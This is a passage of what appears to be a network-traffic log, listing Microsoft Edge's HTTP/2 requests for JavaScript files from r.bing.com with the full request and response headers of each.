referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:03:08 GMT
etag: 0x8DCDC5E8FFA02AC
content-length: 20129
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: dqPx6aRSVk4Pjc5sDuER6A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c2ddf672-501e-006f-0c9a-164244000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=128924
expires: Sat, 19 Oct 2024 08:52:29 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4041
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/czeEPNlpDVWsmJfEnL747Yh-AxQ.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/czeEPNlpDVWsmJfEnL747Yh-AxQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:42:37 GMT
etag: 0x8DCDC64140C090D
content-type: text/javascript; charset=utf-8
content-md5: dnpmZoUOxlJ89heLQg9RPg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 70cdbd39-101e-0068-63d9-16b4c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 273
vary: Accept-Encoding
akamai-grn: 0.b5777b5c.1728189415.2386e3c7
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=258790
expires: Sun, 20 Oct 2024 20:56:55 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4042
timing-allow-origin: *
GET

https://r.bing.com/rp/X-RU3l-2R4Eoz9TUYWyziyccOjA.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/X-RU3l-2R4Eoz9TUYWyziyccOjA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/javascript; charset=utf-8
content-md5: WtL+AZkqTZVxjfCn+olL5A==
last-modified: Tue, 24 Sep 2024 06:31:54 GMT
etag: 0x8DCDC6294C38C12
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 236b9e14-b01e-006e-24d0-1643b9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 360
vary: Accept-Encoding
cache-control: public, no-transform, max-age=104075
expires: Sat, 19 Oct 2024 01:58:20 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4043
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/nc60aT-MXWFDGmlflZLjNBVVxkM.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/nc60aT-MXWFDGmlflZLjNBVVxkM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:58:40 GMT
etag: 0x8DCDC665211749A
content-length: 3501
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: FOSg83CHS0e4hPgLfMT99Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6d8b4136-901e-0050-37ca-17f598000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=158222
expires: Sat, 19 Oct 2024 17:00:47 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4044
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:00:06 GMT
etag: 0x8DCDC5E23EBB645
content-type: text/javascript; charset=utf-8
content-md5: rqa21C4TqvhBKaqsPZN5dA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6fccf176-f01e-0062-0d04-18ad48000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 808
vary: Accept-Encoding
cache-control: public, no-transform, max-age=288552
expires: Mon, 21 Oct 2024 05:12:57 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4064
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/R5OIlHZUEYWuNhJa46yx5Wir2pM.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/R5OIlHZUEYWuNhJa46yx5Wir2pM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 585
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: sbJ/BFEx86eoWqpF1v/OBg==
last-modified: Tue, 24 Sep 2024 06:22:38 GMT
etag: 0x8DCDC6149E5871E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 150042bc-501e-0002-6231-16e86a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=44490
expires: Fri, 18 Oct 2024 09:25:15 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4065
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/LMseELzCN5mfZkf2INFQKCj-dZU.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/LMseELzCN5mfZkf2INFQKCj-dZU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 14:22:17 GMT
etag: 0x8DCE936F1960753
content-length: 586
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: CtQFcqfpVLjouLzgMBM+Kg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5ef11322-101e-000e-3509-1c069b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.b48f655f.1728676064.dd7597e
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=305990
expires: Mon, 21 Oct 2024 10:03:35 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4066
timing-allow-origin: *
GET

https://r.bing.com/rp/t7vjQF3Su3ZV-EkXGBcNcV5x97o.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/t7vjQF3Su3ZV-EkXGBcNcV5x97o.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:06:43 GMT
etag: 0x8DCDC67727707C5
content-type: text/javascript; charset=utf-8
content-md5: /Hmq8U66L6XVc7uD0Xm88A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4eb8d37e-501e-0002-68f2-14e86a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2784
vary: Accept-Encoding
cache-control: public, no-transform, max-age=291437
expires: Mon, 21 Oct 2024 06:01:02 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4068
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/6t/sR/jnc,nj/2RFgnacsz6nPw9vvxd8AGFyaQr8.js?or=w

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rs/6t/sR/jnc,nj/2RFgnacsz6nPw9vvxd8AGFyaQr8.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 182
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Mon, 14 Oct 2024 12:33:31 GMT
x-eventid: 671054a7577442d2a659e80668adf1a5
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E016
x-as-suppresssetcookie: 1
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Rg82GLJmO5Kkn8Usmm7c0baxu5NNFpwr1evMItfbMl4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
cache-control: public, max-age=356467
expires: Tue, 22 Oct 2024 00:04:52 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4069
timing-allow-origin: *
GET

https://r.bing.com/rp/wdztorm0zepTG5y9h06J4IZsb-U.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/wdztorm0zepTG5y9h06J4IZsb-U.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 2632
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: dJ7Q1hEDQZpSEIL9Tfjy5g==
last-modified: Tue, 24 Sep 2024 07:12:15 GMT
etag: 0x8DCDC68381358DA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8a05dada-901e-0079-23e1-1583da000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=50879
expires: Fri, 18 Oct 2024 11:11:44 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac406a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/bKGfvbVy5iHDG2XSTMlh56y9b8Y.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/bKGfvbVy5iHDG2XSTMlh56y9b8Y.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 989
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: no3q5IDtWMP5jPFHYqq5Bw==
last-modified: Thu, 03 Oct 2024 23:52:40 GMT
etag: 0x8DCE406777B361D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 91a9089f-301e-0019-741e-16c6f8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=80753
expires: Fri, 18 Oct 2024 19:29:38 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac406b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/PhAsLQ7MN1I2HGiAYYV0T_5C5_8.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/PhAsLQ7MN1I2HGiAYYV0T_5C5_8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:20:19 GMT
etag: 0x8DCDC60F70B8C46
content-length: 6951
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: RdJgun+5JT/harEpJrkclw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1d77a17e-c01e-002e-4aac-166a57000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=187266
expires: Sun, 20 Oct 2024 01:04:51 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac406c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Xs0bcRwli50H_9_TOsfurmNnZ64.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/Xs0bcRwli50H_9_TOsfurmNnZ64.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:33:08 GMT
etag: 0x8DCDC62C12D8E25
content-type: text/javascript; charset=utf-8
content-md5: cwdNdlabWDC1hjuwYmzczw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8a65c526-f01e-0040-06b5-14c37e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1225
vary: Accept-Encoding
cache-control: public, no-transform, max-age=200501
expires: Sun, 20 Oct 2024 04:45:26 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac406d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/2pI-3yxS71qnL6vzhVIltDQouTg.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/2pI-3yxS71qnL6vzhVIltDQouTg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 1320
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: TJJLjTJdafNm/EE7zNTGjw==
last-modified: Mon, 14 Oct 2024 19:34:30 GMT
etag: 0x8DCEC873924D630
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fb92f276-801e-006d-20c6-1e40be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=204581
expires: Sun, 20 Oct 2024 05:53:26 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac406e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 245
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ItmcJflzfwBqUrBIYlGXpQ==
last-modified: Tue, 24 Sep 2024 07:11:33 GMT
etag: 0x8DCDC681EDAC2C8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 261a5bac-401e-0034-7fb8-1b4538000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=151626
expires: Sat, 19 Oct 2024 15:10:51 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac406f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/WjLJz0ZZ3W6qclUa_RsS6VdZFzE.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/WjLJz0ZZ3W6qclUa_RsS6VdZFzE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:31:38 GMT
etag: 0x8DCDC628B41A2BA
content-length: 4674
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: BPyOi7Ua4VjrwhCEYjxU+w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a798235b-f01e-000f-69e3-140766000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=238977
expires: Sun, 20 Oct 2024 15:26:42 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4070
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/gGRPwribt8XPTQXpd2zkMD5o04w.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/gGRPwribt8XPTQXpd2zkMD5o04w.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 494
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: I/KVjWbAxZXfBeLqiVYi3w==
